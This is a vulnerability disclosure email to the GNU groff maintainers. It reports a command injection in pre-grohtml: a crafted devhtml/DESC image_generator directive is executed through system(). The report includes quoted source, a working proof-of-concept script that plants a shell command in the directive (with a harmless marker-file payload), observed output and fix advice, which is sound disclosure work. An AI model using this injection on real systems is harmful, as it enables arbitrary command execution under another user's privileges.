[BUG] GNU groff 1.24.0: OS command injection (CWE-78) in pre-grohtml image_generator handling via crafted devhtml/DESC

wheat MAX Wed, 10 Jun 2026 05:37:10 -0700

Hello maintainers, we have discovered a injection bug in the new version of
groff.


# GNU groff 1.24.0: OS command injection (CWE-78) in pre-grohtml
image_generator handling via crafted devhtml/DESC

## Summary

- **CWE**: CWE-78 (Improper Neutralization of Special Elements used in an
OS Command / OS Command Injection)
- **Vendor**: GNU Project
- **Product**: GNU groff (`pre-grohtml` / `groff -Thtml` pipeline)
- **Affected Version(s)**: GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e` (tested as GNU groff 1.24.0)
- **Affected Component(s)**:
  - `src/preproc/html/pre-html.cpp`, `get_image_generator()` — reads the
`image_generator` directive from the `devhtml/DESC` device description
selected through the groff font/device search path.
  - `src/preproc/html/pre-html.cpp`, `imageList::createPage()` — inserts
the `image_generator` string directly into a shell command string.
  - `src/preproc/html/pre-html.cpp`, `html_system()` — executes the
constructed command string with `system()`.
- **Attack Type / Vector**: Local — via a crafted groff font/device
directory supplied with `-F`, containing a malicious `devhtml/DESC`
`image_generator` directive, when `groff -Thtml` processes input that
triggers image generation.
- **Impact**: Arbitrary command execution with the privileges of the user
running `groff -Thtml`.

This report is independent from the companion GNU groff `eqn` CWE-121
report. They affect different groff components and different attack
surfaces: this issue is command injection in the HTML preprocessing
pipeline, while the companion report is a stack-based buffer overflow in
the `eqn` parser.

---

## Technical Details / Root Cause

In GNU groff, the HTML output pipeline uses `pre-grohtml` to prepare input
for HTML formatting and to generate images for content such as equations.
`pre-grohtml` reads device-description files from the groff font/device
search path. The normal `groff -F <font-directory>` option can select an
alternate font/device directory, including an alternate `devhtml/DESC` file.

The vulnerability is in the interaction between the `image_generator`
directive in `devhtml/DESC` and shell command construction in `pre-grohtml`:

1. **Attacker-controlled device directive is read from the selected font
path**: `get_image_generator()` opens `devhtml/DESC` through
`font_path.open_file()`, then returns the text after the `image_generator`
keyword without shell escaping, validation, or restriction:
   ```cpp
   static char *get_image_generator(void)
   {
     char *pathp;
     FILE *f;
     char *generator = 0 /* nullptr */;
     const char keyword[] = "image_generator";
     const size_t keyword_len = strlen(keyword);
     f = font_path.open_file(devhtml_desc, &pathp);
     if (0 /* nullptr */ == f)
       fatal("cannot open file '%1': %2", devhtml_desc, strerror(errno));
     int lineno = 0;
     while (get_line(f, pathp, lineno++)) {
       char *cursor = linebuf;
       size_t limit = strlen(linebuf);
       char *end = linebuf + limit;
       if (0 == (strncmp(linebuf, keyword, keyword_len))) {
         cursor += keyword_len;
         // At least one space or tab is required.
         if(!(' ' == *cursor) || ('\t' == *cursor))
           continue;
         cursor++;
         while((cursor < end) && ((' ' == *cursor) || ('\t' == *cursor)))
           cursor++;
         if (cursor == end)
           continue;
         generator = cursor;
       }
       ...
     }
     free(pathp);
     fclose(f);
     return generator;
   }
   ```

2. **The directive is stored as the global image generator command**:
During startup, `main()` copies the returned string into `image_gen`:
   ```cpp
   image_gen = strsave(get_image_generator());
   if (0 /* nullptr */ == image_gen)
     fatal("'image_generator' directive not found in file '%1'",
           devhtml_desc);
   ```
   At this point, a crafted `devhtml/DESC` can make `image_gen` contain
shell syntax such as `/bin/sh -c 'touch /tmp/marker' #`.

3. **The directive is concatenated into a shell command**: When HTML output
requires image generation, `imageList::createPage()` constructs a command
string and places `image_gen` at the beginning of the command:
   ```cpp
   int imageList::createPage(int pageno)
   {
     ...
     const char *s = make_string("ps2ps -sPageList=%d %s %s",
                                 pageno, psFileName, psPageName);
     html_system(s, 1);
     assert(strlen(image_gen) > 0);
     s = make_string("echo showpage | "
                     "%s%s -q -dBATCH -dSAFER "
                     "-dDEVICEHEIGHTPOINTS=792 "
                     "-dDEVICEWIDTHPOINTS=%d -dFIXEDMEDIA=true "
                     "-sDEVICE=%s -r%d %s "
                     "-sOutputFile=%s %s -",
                     image_gen,
                     EXE_EXT,
                     (getMaxX(pageno) * image_res) / postscriptRes,
                     image_device,
                     image_res,
                     antiAlias,
                     imagePageName,
                     psPageName);
     html_system(s, 1);
     free(const_cast<char *>(s));
     ...
   }
   ```

4. **The constructed string is executed by the shell**: `html_system()`
passes the constructed command string to `system()`:
   ```cpp
   static void html_system(const char *s, int redirect_stdout)
   {
     ...
     int status = system(s);
     ...
   }
   ```
   `system()` invokes `/bin/sh -c`, so shell metacharacters and shell
syntax in `image_generator` are interpreted semantically. A trailing `#` in
the malicious directive comments out the rest of the command appended by
`pre-grohtml`.

No neutralization occurs anywhere on this path. The `image_generator` value
is selected from an attacker-controlled device-description file,
concatenated into a shell command, and executed with `system()`.

---

## Reproduction (PoC)

The command injection is reproducible on the default upstream build of GNU
groff on Linux. The PoC below creates a valid alternate font/device
directory by copying the stock `devhtml` and `devps` device descriptions,
then changes only the `image_generator` directive.

```sh
cd ~/groff_master
rm -rf /tmp/groff_font_cwe78 /tmp/groff_prehtml_cwe78_master
mkdir -p /tmp/groff_font_cwe78/devhtml /tmp/groff_font_cwe78/devps

# Preserve valid device descriptions and modify only image_generator.
cp font/devhtml/DESC /tmp/groff_font_cwe78/devhtml/DESC
cp font/devps/DESC /tmp/groff_font_cwe78/devps/DESC
python3 - <<'PY'
p = '/tmp/groff_font_cwe78/devhtml/DESC'
lines = open(p).read().splitlines()
out = []
for line in lines:
    if line.startswith('image_generator'):
        out.append("image_generator /bin/sh -c 'touch
/tmp/groff_prehtml_cwe78_master' #")
    else:
        out.append(line)
open(p, 'w').write('\n'.join(out) + '\n')
PY

# Use an equation to trigger HTML image generation.
cat > /tmp/eqn_image_cwe78.roff <<'R'
.EQ
a over b
.EN
R

./test-groff -F /tmp/groff_font_cwe78 -e -Thtml /tmp/eqn_image_cwe78.roff \
  >/tmp/groff_html_master.out 2>/tmp/groff_html_master.err

echo "exit=$?"
ls -l /tmp/groff_prehtml_cwe78_master
sed -n '1,8p' /tmp/groff_html_master.err
```

The PoC uses two small files/directories. The relevant modified line in
`/tmp/groff_font_cwe78/devhtml/DESC` is:

```text
image_generator /bin/sh -c 'touch /tmp/groff_prehtml_cwe78_master' #
```

The input document `/tmp/eqn_image_cwe78.roff` is intentionally minimal;
its only purpose is to trigger HTML image generation:

```roff
.EQ
a over b
.EN
```

Observed result on Ubuntu 24.04 (`gcc 13.3.0`, default `./bootstrap &&
./configure && make`), using GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e`:

```text
GNU groff version 1.24.0
image_generator /bin/sh -c 'touch /tmp/groff_prehtml_cwe78_master' #
master exit=0
MASTER_MARKER_CREATED
-rw-rw-r-- 1 zijian zijian 0 Jun 10 00:22 /tmp/groff_prehtml_cwe78_master
pamcut: Error reading first byte of what is expected to be a Netpbm magic
number.  Most often, this means your input file is empty
pnmcrop: Error reading first byte of what is expected to be a Netpbm magic
number.  Most often, this means your input file is empty
pnmtopng: Error reading first byte of what is expected to be a Netpbm magic
number.  Most often, this means your input file is empty
pre-grohtml: command 'pamcut 115 3 9 29 < /tmp/groff-page-0AmDwB | pnmcrop
-quiet| pnmtopng -quiet -background rgb:f/f/f -transparent rgb:f/f/f>
grohtml-2210740-2.png' returned status 1
```

The marker file `/tmp/groff_prehtml_cwe78_master` is created by the command
embedded in `devhtml/DESC`. This confirms semantic command execution in the
stock compiled binary. The later `pamcut`/`pnmcrop` diagnostics occur only
because the PoC replaces the expected Ghostscript program with a
marker-file command; they are not required for command execution.

A final verification run after report formatting used a fresh marker file
and reproduced the same semantic injection:

```text
groff -F malicious -e -Thtml exit=0
MARKER_CREATED
-rw-rw-r-- 1 zijian zijian 0 Jun 10 00:29 /tmp/reverify_cwe78_marker
```

---

## Fix / Mitigation

Avoid executing a shell command constructed from a device-description
string. The `image_generator` directive should be treated as an executable
path or command name, not as shell syntax.

**Recommended fix**: Replace the `system()` call with a direct `fork()` +
`execvp()` style invocation of the image generator using an `argv` array.
This ensures that the image-generator path and its arguments are passed as
separate arguments and cannot be interpreted as shell commands.

If configurable arguments are required, parse them with a shell-free
tokenizer and pass each token as a separate `argv` element. Do not pass the
resulting string through `/bin/sh -c`.

### Recommended Mitigations

- **Preferred**: Replace `system()` in the image-generation path with a
shell-free process invocation (`fork()` + `execvp()` or equivalent).
- If patching is not immediately possible:
  - Do not run `groff -Thtml` with untrusted `-F` font/device directories.
  - Do not allow untrusted users to supply `devhtml/DESC` files.
  - Pin groff's font/device path to a trusted directory and sandbox the
formatter when processing untrusted input.

Thank you.

[BUG] GNU groff 1.24.0: OS command injection (CWE-78) in pre-grohtml image_generator handling via crafted devhtml/DESC

Reply via email to